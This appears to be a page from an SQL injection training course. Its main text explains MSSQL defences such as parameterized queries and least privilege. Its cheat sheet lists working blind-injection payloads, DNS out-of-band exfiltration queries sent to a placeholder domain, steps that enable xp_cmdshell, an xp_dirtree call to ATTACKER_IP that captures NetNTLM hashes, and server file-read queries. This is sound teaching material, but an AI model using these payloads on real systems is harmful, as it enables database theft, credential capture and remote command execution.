Blind SQL Injection

Preventing SQL Injection Vulnerabilities

Input Validation / Sanitization

SQL injection happens because developers create dynamic queries using user input that isn't properly sanitized. You (as a developer) should always sanitize user input, and if it is expected to match a certain form (e.g. email) then validate. The best mindset is to treat all user input as if it were dangerous.

Parameterized Queries

Using parameterized queries is a very good way to avoid SQLi vulnerabilities, because you pass the query and variables separately allowing the server to understand what is code and what is data, regardless of user input.

Here is an example of a vulnerable SQL query that concatenates user input into the query.

...
$sql = "SELECT email FROM accounts WHERE username = '" . $_POST['username'] . "'";
$stmt = sqlsrv_query($conn, $sql);
$row = sqlsrv_fetch_array($stmt, SQLSRV_FETCH_ASSOC);
...
sqlsrv_free_stmt($stmt);  
...

This is how the same query would look like if it were parameterized. It's a small change, but it's the difference between vulnerable and secure code.

$sql = "SELECT email FROM accounts WHERE username = ?";  
$stmt = sqlsrv_query($conn, $sql, array($_POST['username'])); 
$row = sqlsrv_fetch_array($stmt, SQLSRV_FETCH_ASSOC); 
...
sqlsrv_free_stmt($stmt);

Note: Even after all of this, we should still not completely trust all user-data stored in the db, as we may always miss something and the user may be able to store something malicious in the db. This is why it is also recommended to also apply sanitization/filtering on data output, escpecially when outputting user-generated data. This way, we prevent 2nd-level SQL attacks, which execute upon data output instead of data input.

MSSQL-Specific Precautions

Regarding MSSQL specifically, there are a couple of things you may want to do to prevent MSSQL-specific attacks.

Don't Run Queries as Sysadmin!

First and foremost, don't use sa to run your queries. More concretely, use an account with as few privileges as possible. Any extra privileges can and will be exploited by attackers who identify an SQL injection.

This graphic (source) highlights the built-in database roles in MSSQL. The public role is the default role and anything else is extra (although the roles db_denydatareader and db_denydatawriter actually take away privileges).

Disable Dangerous Functions

You may want to disable dangerous functions for users who do not need them. For example, attackers can use xp_dirtree to leak NetNTLM hashes, and it's likely your website doesn't use this function, so you may want to disable it for the specific user your website uses to query the database.

For example, to revoke execution privileges on xp_dirtree for all users with the public role, we would run this command:

REVOKE EXECUTE ON xp_dirtree TO public

Note: It is possible to completely disable functions like xp_dirtree, but this is not something you'd want to do, as the server itself uses this function.

Previous Next

Tools of the Trade

Preventing SQL Injection Vulnerabilities

Defending against SQL Injection

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

Boolean-based

' AND 1=1;--

Time-based

'; IF (1=1) WAITFOR DELAY '0:0:10';--

DNS OOB

SQL Function	SQL Query
`master..xp_dirtree`	`DECLARE @T varchar(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_dirtree "\\'+@T+'.YOUR.DOMAIN\\x"');`
`master..xp_fileexist`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_fileexist "\\'+@T+'.YOUR.DOMAIN\\x"');`
`master..xp_subdirs`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_subdirs "\\'+@T+'.YOUR.DOMAIN\\x"');`
`sys.dm_os_file_exists`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM sys.dm_os_file_exists('\\'+@T+'.YOUR.DOMAIN\x');`
`fn_trace_gettable`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM fn_trace_gettable('\\'+@T+'.YOUR.DOMAIN\x.trc',DEFAULT);`
`fn_get_audit_file`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM fn_get_audit_file('\\'+@T+'.YOUR.DOMAIN\',DEFAULT,DEFAULT);`
`split result into sub-domains`	`DECLARE @T VARCHAR(MAX); DECLARE @A VARCHAR(63); DECLARE @B VARCHAR(63); SELECT @T=CONVERT(VARCHAR(MAX), CONVERT(VARBINARY(MAX), flag), 1) from flag; SELECT @A=SUBSTRING(@T,3,63); SELECT @B=SUBSTRING(@T,3+63,63); SELECT * FROM fn_get_audit_file('\\'+@A+'.'+@B+'.YOUR.DOMAIN\',DEFAULT,DEFAULT);`

[MSSQL] RCE

-- Check if we are sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');

-- Enable 'Advanced Options'
EXEC sp_configure 'Show Advanced Options', '1';
RECONFIGURE;

-- Enable 'xp_cmdshell'
EXEC sp_configure 'xp_cmdshell', '1';
RECONFIGURE;

-- Ping ourselves
EXEC xp_cmdshell 'ping /n 4 192.168.43.164';

[MSSQL] NetNTLM

[!bash!]$ sudo python3 Responder.py -I eth0

EXEC master..xp_dirtree '\\<ATTACKER_IP>\myshare', 1, 1;

[!bash!]$ hashcat -m 5600 'jason::SQL01:bd7f162c24a39a0f:94DF80C5ABB...SNIP...000000' /usr/share/wordlists/rockyou.txt

[MSSQL] File Read

-- Check if we have the permissions needed to read files
SELECT COUNT(*) FROM fn_my_permissions(NULL, 'DATABASE') WHERE permission_name = 'ADMINISTER BULK OPERATIONS' OR permission_name = 'ADMINISTER DATABASE BULK OPERATIONS';

-- Get the length of a file
SELECT LEN(BulkColumn) FROM OPENROWSET(BULK '<path>', SINGLE_CLOB) AS x

-- Get the contents of a file
SELECT BulkColumn FROM OPENROWSET(BULK '<path>', SINGLE_CLOB) AS x

Blind SQL Injection

Preventing SQL Injection Vulnerabilities

Input Validation / Sanitization

Parameterized Queries

MSSQL-Specific Precautions

Don't Run Queries as Sysadmin!

Disable Dangerous Functions

Table of Contents

Introduction

Boolean-based SQLi

Time-based SQLi

MSSQL-specific Attacks

Tools of the Trade

Preventing SQL Injection Vulnerabilities

Skills Assessment

My Workstation